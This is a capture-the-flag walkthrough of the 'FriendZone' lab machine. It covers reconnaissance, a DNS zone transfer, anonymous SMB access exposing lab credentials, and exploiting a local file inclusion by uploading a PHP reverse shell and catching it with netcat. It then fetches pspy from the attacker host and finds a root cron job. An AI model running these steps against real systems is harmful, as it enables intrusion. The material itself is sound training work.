$ sudo nmap -A -T4 -p- 10.10.10.123
[sudo] password for ruben:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-01 09:43 CEST
Nmap scan report for 10.10.10.123
Host is up (0.053s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
Network Distance: 2 hops
Service Info: Hosts: FRIENDZONE, 127.0.0.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -1h00m00s, deviation: 1h43m54s, median: -1s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: friendzone
| NetBIOS computer name: FRIENDZONE\x00
| Domain name: \x00
| FQDN: friendzone
|_ System time: 2020-10-01T10:44:24+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-10-01T07:44:23
|_ start_date: N/A
TRACEROUTE (using port 3306/tcp)
HOP RTT ADDRESS
1 96.36 ms 10.10.14.1
2 96.82 ms 10.10.10.123
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.10 seconds
$ gobuster -w /usr/share/wordlists/dirb/common.txt dir -u http://10.10.10.123/
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.123/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/10/08 16:55:12 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/.hta (Status: 403)
/index.html (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
/wordpress (Status: 301)
===============================================================
2020/10/08 16:55:35 Finished
===============================================================
Access http://10.10.10.123 in a browser.

Access https://10.10.10.123/ as well.

The SSL certificate's common name is friendzone.red, which is a virtual host.
So we can access https://friendzone.red/ once that name has been added to the /etc/hosts file.

Since the BIND server on port 53 is exposed, we can attempt a DNS zone transfer for that domain, which I saw earlier on the main page, and get the list of all its sub-domains.
More info about DNS zone transfers (AXFR) can be found here: https://www.acunetix.com/blog/articles/dns-zone-transfers-axfr/
$ dig axfr friendzone.red @10.10.10.123
; <<>> DiG 9.16.6-Debian <<>> axfr friendzone.red @10.10.10.123
;; global options: +cmd
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red. 604800 IN AAAA ::1
friendzone.red. 604800 IN NS localhost.
friendzone.red. 604800 IN A 127.0.0.1
administrator1.friendzone.red. 604800 IN A 127.0.0.1
hr.friendzone.red. 604800 IN A 127.0.0.1
uploads.friendzone.red. 604800 IN A 127.0.0.1
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 44 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: jue oct 01 11:29:39 CEST 2020
;; XFR size: 8 records (messages 1, bytes 289)
VHosts found:
- friendzone.red
- administrator1.friendzone.red
- hr.friendzone.red
- uploads.friendzone.red
These virtual hosts need to be added to the /etc/hosts file, pointing at 10.10.10.123 (the zone's own A records point at 127.0.0.1, so they cannot be used as-is).
Since SMB is also available, we can enumerate which shares are accessible.
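As an added example (not part of the original writeup), a small parser for the `dig axfr` output above that extracts every name with an A/AAAA record, checks that the zone only points at loopback, and builds the single /etc/hosts line needed; the zone text is embedded as a constructed copy of the transfer shown above.

```python
"""Turn a `dig axfr` answer into an /etc/hosts entry for the scanned host."""
import re

# Constructed sample: the AXFR answer shown in the writeup, copied verbatim.
AXFR_OUTPUT = """\
; <<>> DiG 9.16.6-Debian <<>> axfr friendzone.red @10.10.10.123
;; global options: +cmd
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red. 604800 IN AAAA ::1
friendzone.red. 604800 IN NS localhost.
friendzone.red. 604800 IN A 127.0.0.1
administrator1.friendzone.red. 604800 IN A 127.0.0.1
hr.friendzone.red. 604800 IN A 127.0.0.1
uploads.friendzone.red. 604800 IN A 127.0.0.1
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 44 msec
"""

# dig prints one record per line as: <owner> <ttl> <class> <type> <rdata...>
RECORD_RE = re.compile(
    r"^(?P<owner>\S+)\s+(?P<ttl>\d+)\s+IN\s+(?P<type>[A-Z0-9]+)\s+(?P<rdata>.*)$"
)


def parse_axfr(text):
    """Return (owner, type, rdata) tuples, skipping dig's ';' comment lines."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        m = RECORD_RE.match(line)
        if m:
            records.append((m.group("owner").rstrip("."), m.group("type"), m.group("rdata")))
    return records


def hostnames_from_records(records):
    """Every owner of an A/AAAA record, in zone order, without duplicates."""
    names = []
    for owner, rtype, _ in records:
        if rtype in ("A", "AAAA") and owner not in names:
            names.append(owner)
    return names


def loopback_only(records):
    """True if all A/AAAA data is loopback, i.e. the zone cannot be used to reach the vhosts."""
    addrs = {rdata for _, rtype, rdata in records if rtype in ("A", "AAAA")}
    return bool(addrs) and addrs <= {"127.0.0.1", "::1"}


def hosts_line(target_ip, names):
    """The /etc/hosts line mapping all discovered vhosts to the real target IP."""
    return "%s %s" % (target_ip, " ".join(names))


if __name__ == "__main__":
    recs = parse_axfr(AXFR_OUTPUT)
    if loopback_only(recs):
        print("# zone A records point at loopback; mapping names to the scanned host instead")
    print(hosts_line("10.10.10.123", hostnames_from_records(recs)))
```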
$ smbclient -N -L //10.10.10.123
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
Files Disk FriendZone Samba Server Files /etc/Files
general Disk FriendZone Samba Server Files
Development Disk FriendZone Samba Server Files
IPC$ IPC IPC Service (FriendZone server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
$ smbmap -H 10.10.10.123
[+] Guest session IP: 10.10.10.123:445 Name: friendzone.htb
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
Files NO ACCESS FriendZone Samba Server Files /etc/Files
general READ ONLY FriendZone Samba Server Files
Development READ, WRITE FriendZone Samba Server Files
IPC$ NO ACCESS IPC Service (FriendZone server (Samba, Ubuntu))
Only general and Development can be accessed anonymously.
The Development share is also writable, so it can be used to upload a file.
$ smbclient -N \\10.10.10.123\Files
tree connect failed: NT_STATUS_ACCESS_DENIED
$ smbclient -N \\10.10.10.123\general
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Jan 16 21:10:51 2019
.. D 0 Wed Jan 23 22:51:02 2019
creds.txt N 57 Wed Oct 10 01:52:42 2018
9221460 blocks of size 1024. 6459256 blocks available
smb: \> get creds.txt
getting file \creds.txt of size 57 as creds.txt (0,3 KiloBytes/sec) (average 0,3 KiloBytes/sec)
smb: \> cd ..
smb: \> exit
$ smbclient -N \\10.10.10.123\Development
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Jan 16 21:03:49 2019
.. D 0 Wed Jan 23 22:51:02 2019
9221460 blocks of size 1024. 6459256 blocks available
$ cat creds.txt
creds for the admin THING:
admin:WORKWORKHhallelujah@#
Running autorecon as well, we found some interesting details about the shares:
smb-enum-shares:
| account_used: guest
| \\10.10.10.123\Development:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 3
| Max Users: <unlimited>
| Path: C:\etc\Development
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\Files:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files /etc/Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\hole
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.10.123\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (FriendZone server (Samba, Ubuntu))
| Users: 5
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\general:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 1
| Max Users: <unlimited>
| Path: C:\etc\general
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
We now know the server-side paths behind the SMB shares (Samba reports them with a C:\ prefix, but on this Linux host they correspond to /etc/Development, /etc/hole, and so on):
- Path: C:\etc\Development
- Path: C:\etc\hole
- Path: C:\tmp
- Path: C:\etc\general
- Path: C:\var\lib\samba\printers
Since we discovered several vhosts, we can also run gobuster against each of them.
$ gobuster -w /usr/share/wordlists/dirb/common.txt dir -u https://friendzone.red/ -k
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://friendzone.red/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/10/08 16:56:44 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/admin (Status: 301)
/index.html (Status: 200)
/js (Status: 301)
/server-status (Status: 403)
===============================================================
2020/10/08 16:57:06 Finished
===============================================================
$ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt dir -u https://administrator1.friendzone.red -k -x .php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://administrator1.friendzone.red
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2020/10/08 17:37:03 Starting gobuster
===============================================================
/images (Status: 301)
/login.php (Status: 200)
/dashboard.php (Status: 200)
/timestamp.php (Status: 200)
===============================================================
2020/10/08 17:52:06 Finished
===============================================================
$ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt dir -u https://hr.friendzone.red -k
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://hr.friendzone.red
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/10/08 18:10:47 Starting gobuster
===============================================================
===============================================================
2020/10/08 18:18:41 Finished
===============================================================
$ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt dir -u https://hr.friendzone.red -k -x .php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://hr.friendzone.red
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2020/10/08 17:52:45 Starting gobuster
===============================================================
===============================================================
2020/10/08 18:09:10 Finished
===============================================================
$ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt dir -u https://uploads.friendzone.red -k
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://uploads.friendzone.red
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/10/08 18:19:09 Starting gobuster
===============================================================
/files (Status: 301)
===============================================================
2020/10/08 18:26:50 Finished
===============================================================
$ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt dir -u https://uploads.friendzone.red -k -x .php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://uploads.friendzone.red
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2020/10/08 18:27:04 Starting gobuster
===============================================================
/files (Status: 301)
/upload.php (Status: 200)
===============================================================
2020/10/08 18:42:22 Finished
===============================================================
Access https://administrator1.friendzone.red and log in with the credentials found earlier (admin:WORKWORKHhallelujah@#).
You'll be redirected to:
https://administrator1.friendzone.red/login.php
Login Done ! visit /dashboard.php
Let's visit that page:
https://administrator1.friendzone.red/dashboard.php

Try what the page suggests:
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=pagename

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=login
If we analyze these parameters:
image_id: the image displayed on the page, loaded from
https://administrator1.friendzone.red/images/a.jpg
pagename: the name of the PHP file to include, given without its extension (login, timestamp...), so the server appends .php and includes whatever path we supply
This is a Local File Inclusion vulnerability: the include path is built directly from user input.
https://en.wikipedia.org/wiki/File_inclusion_vulnerability
So, could we use this finding to upload a file to the system and execute it? Maybe a reverse shell?
Remembering the autorecon results:
| \\10.10.10.123\Development:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 3
| Max Users: <unlimited>
| Path: C:\etc\Development
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
We can upload the reverse shell to this share and then include it through the vulnerable pagename parameter.
The common pentestmonkey PHP reverse shell will do the trick.
We just need to change the IP and the desired port.

$ smbclient -N \\10.10.10.123\Development
smb: \> put shell.php
putting file shell.php as \shell.php (20,6 kb/s) (average 20,6 kb/s)
smb: \>
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/shell
$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.123] 43440
Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
13:27:23 up 22 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
We can upgrade our shell to an interactive TTY:
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@FriendZone:/$
www-data@FriendZone:/$ whoami
www-data
www-data@FriendZone:/$ cd /home
www-data@FriendZone:/home$ ls
friend
www-data@FriendZone:/home/friend$ cat user.txt
a9edXXXXXXXXXXXXXXXXXXXXXXXXXXXX
We can run pspy to start enumerating the system and work out how to perform a privilege escalation.
(https://github.com/DominicBreuker/pspy)
pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute.
As we are on a 64-bit system,
www-data@FriendZone:/home/friend$ uname -a
Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
we can use the 64-bit build of pspy (pspy64):
https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
$ wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
--2020-10-10 12:52:08-- https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
Resolviendo github.com (github.com)... 140.82.121.3
Conectando con github.com (github.com)[140.82.121.3]:443... conectado.
Petición HTTP enviada, esperando respuesta... 302 Found
Localización: https://github-production-release-asset-2e65be.s3.amazonaws.com/120821432/d54f2200-c51c-11e9-8d82-f178cd27b2cb?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20201010%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20201010T105213Z&X-Amz-Expires=300&X-Amz-Signature=17c6be9e3625356c13d2a32baa8e094d364104f00b76ee4ad185d443de096a83&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=120821432&response-content-disposition=attachment%3B%20filename%3Dpspy64&response-content-type=application%2Foctet-stream [siguiendo]
--2020-10-10 12:52:13-- https://github-production-release-asset-2e65be.s3.amazonaws.com/120821432/d54f2200-c51c-11e9-8d82-f178cd27b2cb?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20201010%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20201010T105213Z&X-Amz-Expires=300&X-Amz-Signature=17c6be9e3625356c13d2a32baa8e094d364104f00b76ee4ad185d443de096a83&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=120821432&response-content-disposition=attachment%3B%20filename%3Dpspy64&response-content-type=application%2Foctet-stream
Resolviendo github-production-release-asset-2e65be.s3.amazonaws.com (github-production-release-asset-2e65be.s3.amazonaws.com)... 52.216.154.44
Conectando con github-production-release-asset-2e65be.s3.amazonaws.com (github-production-release-asset-2e65be.s3.amazonaws.com)[52.216.154.44]:443... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 3078592 (2,9M) [application/octet-stream]
Grabando a: “pspy64”
pspy64 100%[======================>] 2,94M 606KB/s en 6,7s
2020-10-10 12:52:21 (450 KB/s) - “pspy64” guardado [3078592/3078592]
$ python -m SimpleHTTPServer 8080
www-data@FriendZone:/etc/Development$ wget http://10.10.14.12:8080/pspy64 pspy64
--2020-10-10 13:55:56-- http://10.10.14.12:8080/pspy64
Connecting to 10.10.14.12:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: 'pspy64'
2020-10-10 13:56:02 (478 KB/s) - 'pspy64' saved [3078592/3078592]
--2020-10-10 13:56:02-- http://pspy64/
Resolving pspy64 (pspy64)... failed: Temporary failure in name resolution.
wget: unable to resolve host address 'pspy64'
FINISHED --2020-10-10 13:56:02--
Total wall clock time: 6.9s
Downloaded: 1 files, 2.9M in 6.3s (478 KB/s)
www-data@FriendZone:/etc/Development$
www-data@FriendZone:/etc/Development$ ls
pspy64 reverse-shell.php shell.php
www-data@FriendZone:/etc/Development$ chmod +x pspy64
www-data@FriendZone:/etc/Development$ ./pspy64
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2020/10/10 13:57:56 CMD: UID=0 PID=996 | /usr/sbin/smbd --foreground --no-process-group
2020/10/10 13:57:56 CMD: UID=0 PID=988 | /usr/sbin/smbd --foreground --no-process-group
2020/10/10 13:57:56 CMD: UID=0 PID=98 |
2020/10/10 13:57:56 CMD: UID=0 PID=929 | /usr/sbin/smbd --foreground --no-process-group
2020/10/10 13:57:56 CMD: UID=0 PID=9 |
2020/10/10 13:57:56 CMD: UID=0 PID=89 |
2020/10/10 13:57:56 CMD: UID=107 PID=853 | /usr/sbin/exim4 -bd -q30m
2020/10/10 13:57:56 CMD: UID=0 PID=85 |
2020/10/10 13:57:56 CMD: UID=0 PID=849 | /usr/sbin/smbd --foreground --no-process-group
2020/10/10 13:57:56 CMD: UID=0 PID=844 | /usr/sbin/smbd --foreground --no-process-group
2020/10/10 13:57:56 CMD: UID=0 PID=843 | /usr/sbin/smbd --foreground --no-process-group
2020/10/10 13:57:56 CMD: UID=0 PID=82 |
2020/10/10 13:57:56 CMD: UID=0 PID=81 |
2020/10/10 13:57:56 CMD: UID=0 PID=80 |
2020/10/10 13:57:56 CMD: UID=0 PID=8 |
2020/10/10 13:57:56 CMD: UID=0 PID=79 |
2020/10/10 13:57:56 CMD: UID=0 PID=78 |
2020/10/10 13:57:56 CMD: UID=0 PID=77 |
2020/10/10 13:57:56 CMD: UID=0 PID=741 | /usr/sbin/smbd --foreground --no-process-group
2020/10/10 13:57:56 CMD: UID=0 PID=7 |
2020/10/10 13:57:56 CMD: UID=0 PID=6 |
2020/10/10 13:57:56 CMD: UID=0 PID=566 | /usr/sbin/nmbd --foreground --no-process-group
2020/10/10 13:57:56 CMD: UID=33 PID=527 | /usr/sbin/apache2 -k start
2020/10/10 13:57:56 CMD: UID=33 PID=526 | /usr/sbin/apache2 -k start
2020/10/10 13:57:56 CMD: UID=33 PID=525 | /usr/sbin/apache2 -k start
2020/10/10 13:57:56 CMD: UID=33 PID=524 | /usr/sbin/apache2 -k start
2020/10/10 13:57:56 CMD: UID=33 PID=523 | /usr/sbin/apache2 -k start
2020/10/10 13:57:56 CMD: UID=0 PID=513 | /usr/sbin/apache2 -k start
2020/10/10 13:57:56 CMD: UID=0 PID=485 | /sbin/agetty -o -p -- \u --noclear tty1 linux
2020/10/10 13:57:56 CMD: UID=0 PID=473 | /usr/sbin/sshd -D
2020/10/10 13:57:56 CMD: UID=0 PID=467 | /usr/sbin/vsftpd /etc/vsftpd.conf
2020/10/10 13:57:56 CMD: UID=109 PID=455 | /usr/sbin/named -f -4 -u bind
2020/10/10 13:57:56 CMD: UID=0 PID=4 |
2020/10/10 13:57:56 CMD: UID=0 PID=381 | /usr/bin/VGAuthService
2020/10/10 13:57:56 CMD: UID=0 PID=380 | /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
2020/10/10 13:57:56 CMD: UID=102 PID=379 | /usr/sbin/rsyslogd -n
2020/10/10 13:57:56 CMD: UID=103 PID=374 | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
2020/10/10 13:57:56 CMD: UID=0 PID=373 | /usr/lib/accountsservice/accounts-daemon
2020/10/10 13:57:56 CMD: UID=0 PID=371 | /lib/systemd/systemd-logind
2020/10/10 13:57:56 CMD: UID=0 PID=370 | /usr/sbin/cron -f
2020/10/10 13:57:56 CMD: UID=62583 PID=364 | /lib/systemd/systemd-timesyncd
2020/10/10 13:57:56 CMD: UID=101 PID=362 | /lib/systemd/systemd-resolved
2020/10/10 13:57:56 CMD: UID=0 PID=35 |
2020/10/10 13:57:56 CMD: UID=0 PID=34 |
2020/10/10 13:57:56 CMD: UID=0 PID=32 |
2020/10/10 13:57:56 CMD: UID=0 PID=30 |
2020/10/10 13:57:56 CMD: UID=0 PID=29 |
2020/10/10 13:57:56 CMD: UID=0 PID=28 |
2020/10/10 13:57:56 CMD: UID=0 PID=27 |
2020/10/10 13:57:56 CMD: UID=100 PID=267 | /lib/systemd/systemd-networkd
2020/10/10 13:57:56 CMD: UID=0 PID=260 | /lib/systemd/systemd-udevd
2020/10/10 13:57:56 CMD: UID=0 PID=26 |
2020/10/10 13:57:56 CMD: UID=0 PID=25 |
2020/10/10 13:57:56 CMD: UID=0 PID=24 |
2020/10/10 13:57:56 CMD: UID=0 PID=23 |
2020/10/10 13:57:56 CMD: UID=0 PID=227 | /lib/systemd/systemd-journald
2020/10/10 13:57:56 CMD: UID=0 PID=223 | /usr/bin/vmtoolsd
2020/10/10 13:57:56 CMD: UID=0 PID=22 |
2020/10/10 13:57:56 CMD: UID=0 PID=21 |
2020/10/10 13:57:56 CMD: UID=0 PID=20 |
2020/10/10 13:57:56 CMD: UID=0 PID=2 |
2020/10/10 13:57:56 CMD: UID=0 PID=196 |
2020/10/10 13:57:56 CMD: UID=0 PID=195 |
2020/10/10 13:57:56 CMD: UID=0 PID=19 |
2020/10/10 13:57:56 CMD: UID=0 PID=18 |
2020/10/10 13:57:56 CMD: UID=0 PID=175 |
2020/10/10 13:57:56 CMD: UID=0 PID=174 |
2020/10/10 13:57:56 CMD: UID=0 PID=172 |
2020/10/10 13:57:56 CMD: UID=0 PID=170 |
2020/10/10 13:57:56 CMD: UID=0 PID=17 |
2020/10/10 13:57:56 CMD: UID=0 PID=169 |
2020/10/10 13:57:56 CMD: UID=0 PID=168 |
2020/10/10 13:57:56 CMD: UID=0 PID=16 |
2020/10/10 13:57:56 CMD: UID=0 PID=15 |
2020/10/10 13:57:56 CMD: UID=0 PID=14 |
2020/10/10 13:57:56 CMD: UID=0 PID=13 |
2020/10/10 13:57:56 CMD: UID=33 PID=1204 | ./pspy64
2020/10/10 13:57:56 CMD: UID=0 PID=1200 |
2020/10/10 13:57:56 CMD: UID=0 PID=12 |
2020/10/10 13:57:56 CMD: UID=0 PID=1153 |
2020/10/10 13:57:56 CMD: UID=0 PID=115 |
2020/10/10 13:57:56 CMD: UID=0 PID=11 |
2020/10/10 13:57:56 CMD: UID=0 PID=1078 |
2020/10/10 13:57:56 CMD: UID=33 PID=1042 | /bin/bash
2020/10/10 13:57:56 CMD: UID=33 PID=1041 | python3 -c import pty;pty.spawn('/bin/bash')
2020/10/10 13:57:56 CMD: UID=33 PID=1040 | /bin/sh -i
2020/10/10 13:57:56 CMD: UID=33 PID=1036 | sh -c uname -a; w; id; /bin/sh -i
2020/10/10 13:57:56 CMD: UID=33 PID=1027 | /usr/sbin/apache2 -k start
2020/10/10 13:57:56 CMD: UID=33 PID=1026 | /usr/sbin/apache2 -k start
2020/10/10 13:57:56 CMD: UID=0 PID=10 |
2020/10/10 13:57:56 CMD: UID=0 PID=1 | /sbin/init splash
2020/10/10 13:58:01 CMD: UID=0 PID=1214 | /usr/bin/python /opt/server_admin/reporter.py
2020/10/10 13:58:01 CMD: UID=0 PID=1213 | /bin/sh -c /opt/server_admin/reporter.py
2020/10/10 13:58:01 CMD: UID=0 PID=1212 | /usr/sbin/CRON -f
2020/10/10 14:00:01 CMD: UID=0 PID=1217 | /usr/bin/python /opt/server_admin/reporter.py
2020/10/10 14:00:01 CMD: UID=0 PID=1216 | /bin/sh -c /opt/server_admin/reporter.py
2020/10/10 14:00:01 CMD: UID=0 PID=1215 | /usr/sbin/CRON -f
2020/10/10 14:02:01 CMD: UID=0 PID=1220 | /bin/sh -c /opt/server_admin/reporter.py
2020/10/10 14:02:01 CMD: UID=0 PID=1219 | /bin/sh -c /opt/server_admin/reporter.py
2020/10/10 14:02:01 CMD: UID=0 PID=1218 | /usr/sbin/CRON -f
2020/10/10 14:03:00 CMD: UID=0 PID=1222 |
2020/10/10 14:04:01 CMD: UID=0 PID=1225 | /usr/bin/python /opt/server_admin/reporter.py
2020/10/10 14:04:01 CMD: UID=0 PID=1224 | /bin/sh -c /opt/server_admin/reporter.py
2020/10/10 14:04:01 CMD: UID=0 PID=1223 | /usr/sbin/CRON -f
2020/10/10 14:05:15 CMD: UID=0 PID=1226 | /usr/sbin/nmbd --foreground --no-process-group
2020/10/10 14:05:16 CMD: UID=0 PID=1227 | /usr/sbin/exim4 -qG
2020/10/10 14:06:01 CMD: UID=0 PID=1231 | /usr/bin/python /opt/server_admin/reporter.py
2020/10/10 14:06:01 CMD: UID=0 PID=1230 | /bin/sh -c /opt/server_admin/reporter.py
2020/10/10 14:06:01 CMD: UID=0 PID=1229 | /usr/sbin/CRON -f
There is a script, /opt/server_admin/reporter.py, that cron runs as root (UID=0) every two minutes, as the timestamps above show.
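As an added example (not from the writeup or from pspy itself), a small parser that picks the scheduled root job out of pspy's event stream: it groups UID-0 commands, normalises the `/bin/sh -c` and interpreter wrappers down to the script path, and reports any command that repeats at a constant interval. The log is a constructed excerpt in pspy's line format.

```python
"""Find recurring root jobs in pspy output."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample in pspy's format: snapshot noise plus the every-2-minutes job.
PSPY_LOG = """\
2020/10/10 13:57:56 CMD: UID=0 PID=996 | /usr/sbin/smbd --foreground --no-process-group
2020/10/10 13:57:56 CMD: UID=0 PID=98 |
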